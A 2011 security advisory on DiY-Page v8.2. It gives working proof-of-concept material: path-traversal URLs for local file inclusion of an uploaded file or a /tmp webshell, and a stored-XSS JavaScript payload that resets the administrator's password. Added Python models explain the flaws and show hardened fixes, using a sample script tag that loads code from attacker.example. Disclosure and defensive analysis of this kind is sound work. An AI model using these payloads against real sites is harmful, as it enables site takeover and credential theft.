DiY-Page hit by multiple vulnerabilities again - vulnerability warning - the black bar safety net

2011-02-15T00:00:00
ID MYHACK58:62201129160
Type myhack58
Reporter Anonymous
Modified 2011-02-15T00:00:00

Description

Someone recently posted an analysis of the DiY-Page SQL injection vulnerability. Following up on it, I read through the code and found that DiY-Page v8.2 also contains several further vulnerabilities, including a local file inclusion vulnerability, an upload vulnerability and cross-site scripting.

A. Local file inclusion vulnerability

```php
// js.php
// Both path components come straight from the query string; only '.php' is appended.
$incfile=PATH_PRE.'mod/'.$_GET['mod'].'/js/'.$_GET['name'].'.php';
if(!include $incfile) dperror($l_error['cant_include'],$incfile,true);
```

This one is obvious. With magic_quotes_gpc off, an uploaded attachment could be included directly (cutting off the appended .php with the usual %00), but the program detects GPC being off and runs the input through addslashes() itself, so the NUL byte is escaped. addslashes() does nothing about `../` and `/`, though, so we can still drop the .php suffix with long-path truncation, or alternatively upload a webshell into the /tmp directory and include it from there.

POC (the trailing run of slashes, abbreviated here, is the truncation padding that pushes the appended .php off the end of the path):

http://127.0.0.1/diypage/js.php?mod=dpuser&name=../../../up/201102/20110213_dd7ec931179c4dcb6a8ffb8b8786d20b_17872a.txt./////////////////

http://127.0.0.1/diypage/js.php?mod=dpuser&name=../../../../tmp/shell
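To make the inclusion path concrete, here is an added Python model (not DiY-Page's own PHP code) of how js.php assembles `$incfile` from `mod` and `name`, why addslashes() does not stop the traversal, and a whitelist check that would. PATH_PRE is assumed to be `/www/`; the resolved paths depend on that assumption, and the path-length truncation that strips the trailing `.php` on a real target is not modelled, only the traversal itself.

```python
import posixpath
import re

# Assumed install root (PATH_PRE in the real code); every resolved path below depends on it.
PATH_PRE = "/www/"

# Whitelist for the hardened version: a module or script name is a plain identifier, never a path.
SAFE_COMPONENT = re.compile(r"^[A-Za-z0-9_]+$")


def addslashes(s: str) -> str:
    """PHP addslashes(): escapes ' " \\ and NUL only, so '.' and '/' pass through untouched."""
    return re.sub(r"([\\'\"\x00])", r"\\\1", s)


def vulnerable_include_path(mod: str, name: str) -> str:
    """Mirror of the js.php line: PATH_PRE.'mod/'.$_GET['mod'].'/js/'.$_GET['name'].'.php',
    with the program's own addslashes() applied to both parameters first."""
    return PATH_PRE + "mod/" + addslashes(mod) + "/js/" + addslashes(name) + ".php"


def resolved_target(mod: str, name: str) -> str:
    """Where the filesystem actually lands once '..' and repeated '/' are collapsed."""
    return posixpath.normpath(vulnerable_include_path(mod, name))


def escapes_js_dir(mod: str, name: str) -> bool:
    """True when the resolved path lies outside mod/<mod>/js/, i.e. traversal succeeded."""
    js_dir = posixpath.normpath(posixpath.join(PATH_PRE, "mod", mod, "js"))
    return not resolved_target(mod, name).startswith(js_dir + "/")


def hardened_include_path(mod: str, name: str) -> str:
    """Whitelist both components, then re-check the resolved path as a second line of defence.
    Raises ValueError for anything that is not a plain identifier inside mod/<mod>/js/."""
    if not SAFE_COMPONENT.match(mod) or not SAFE_COMPONENT.match(name):
        raise ValueError("mod and name must be plain identifiers")
    js_dir = posixpath.join(PATH_PRE, "mod", mod, "js")
    target = posixpath.normpath(posixpath.join(js_dir, name + ".php"))
    if not target.startswith(js_dir + "/"):
        raise ValueError("include path escapes " + js_dir)
    return target


if __name__ == "__main__":
    # The two payloads from the POC URLs above.
    for name in ("../../../../tmp/shell",
                 "../../../up/201102/20110213_dd7ec931179c4dcb6a8ffb8b8786d20b_17872a.txt./////////////////"):
        print(vulnerable_include_path("dpuser", name))
        print("  resolves to:", resolved_target("dpuser", name), "escapes:", escapes_js_dir("dpuser", name))
        try:
            hardened_include_path("dpuser", name)
        except ValueError as e:
            print("  hardened:", e)
    print(hardened_include_path("dpuser", "dpuser"))
```

The whitelist is what actually closes the hole; the `startswith` check after `normpath` is there so a future change to the regex cannot silently reopen it. Note that the NUL byte really is neutralised by addslashes() (it becomes `\` followed by NUL), which is exactly why the advisory falls back to traversal plus truncation.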

B. XSS (cross-site scripting) vulnerability. There are many cross-site points, since input is not filtered at all; for example this code:

```php
// Publish-entry handler: every POST field is taken over as-is, with no filtering or encoding.
if($_POST['issubmit']==true) {
    $fidarray=trim($_POST['fidarray'],',');
    $backurl='javascript:history.go(-1);';
    $actionurlold=$actionurl;
    $actionurl.='&do=list&cataid='.$_GET['cataid'];
    $entrytitle=$_POST['entrytitle'];       // stored and later echoed unchanged: stored XSS
    $entrycontent=$_POST['entrycontent'];
    $entrytag=trim($_POST['entrytag']);
    ......
```

Write JavaScript into the title when publishing an entry and this XSS fires both on the front end and in the admin back end. Since it is XSS there is a lot one can do with it: hijack the user, steal cookies, escalate privileges, write a shell, and so on. The following is the JavaScript for resetting the administrator's password; it runs in the logged-in administrator's browser, so the forged POST carries the admin's session cookie automatically:

```javascript
// Reset the administrator password from inside the admin's own session (stored XSS -> forged POST).
var xmlhttp = false;
if (window.XMLHttpRequest) {
    xmlhttp = new XMLHttpRequest();
} else if (window.ActiveXObject) {
    xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
    if (!xmlhttp) { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
}
// Edit form of the user-admin module for uid=1, the administrator account
var action = "/diypage/admin.php?mod=modcp&formod=dpuser&item=useradm&do=edit&uid=1&page=1&perpage=20";
// Same fields the edit form submits; dpusernewpassword sets the new password
var data = "gid=2&oldgid=2&dpusername=admin&dpusernewpassword=cnryan&usertpl=&regip=&loginip=&dpuseremail=&dpusermoney=0&dpuserintro=&avatar=default.gif&nickname=&issubmit=true";
xmlhttp.open("POST", action, false);   // synchronous, same-origin: the session cookie goes along
xmlhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xmlhttp.send(data);
```
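As an added example (Python, not DiY-Page's code), the following models the two halves of the chain above: the entry title echoed without encoding, and the admin edit request that the script forges. The form body is the one from the script; the attacker host, the hardened handler and its `currentpassword` re-authentication field are assumptions for illustration.

```python
import html
from urllib.parse import parse_qs

# Constructed sample title; attacker.example is a placeholder host (assumption).
XSS_TITLE = '<script src="http://attacker.example/reset.js"></script>'

# Form body taken from the password-reset script above.
PAYLOAD_DATA = ("gid=2&oldgid=2&dpusername=admin&dpusernewpassword=cnryan&usertpl=&regip="
                "&loginip=&dpuseremail=&dpusermoney=0&dpuserintro=&avatar=default.gif"
                "&nickname=&issubmit=true")


def render_title_vulnerable(title: str) -> str:
    """Models $entrytitle=$_POST['entrytitle'] being echoed back unchanged (stored XSS)."""
    return "<h2>" + title + "</h2>"


def render_title_hardened(title: str) -> str:
    """HTML-entity encode on output; the PHP equivalent is htmlspecialchars($entrytitle, ENT_QUOTES)."""
    return "<h2>" + html.escape(title, quote=True) + "</h2>"


def parse_form(data: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into a flat dict (first value wins)."""
    return {k: v[0] for k, v in parse_qs(data, keep_blank_values=True).items()}


def forged_changes(data: str) -> dict:
    """Only the non-empty fields: what the forged request actually changes on uid=1."""
    return {k: v for k, v in parse_form(data).items() if v}


def process_useradm_edit(form: dict, is_admin: bool, current_password_ok) -> bool:
    """Hardened model (an assumption, not the real handler) of
    admin.php?mod=modcp&formod=dpuser&item=useradm&do=edit.

    A script running in the admin's origin can read any anti-CSRF token out of the page,
    so a token alone does not stop this chain. Requiring the admin's current password for
    a password change does: the injected script has no way to obtain it.
    Returns True when the edit is applied."""
    if not is_admin or form.get("issubmit") != "true":
        return False
    if form.get("dpusernewpassword"):
        if not current_password_ok(form.get("currentpassword", "")):
            return False
    return True


if __name__ == "__main__":
    print(render_title_vulnerable(XSS_TITLE))
    print(render_title_hardened(XSS_TITLE))
    print(forged_changes(PAYLOAD_DATA))
    admin_check = lambda p: p == "s3cret"   # constructed admin password for the demo
    print(process_useradm_edit(parse_form(PAYLOAD_DATA), True, admin_check))
```

Output encoding at every point where `entrytitle` is rendered removes the injection; the re-authentication check is the second layer, because once a script runs in the administrator's origin the session cookie and any page-embedded token are already in the attacker's hands.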
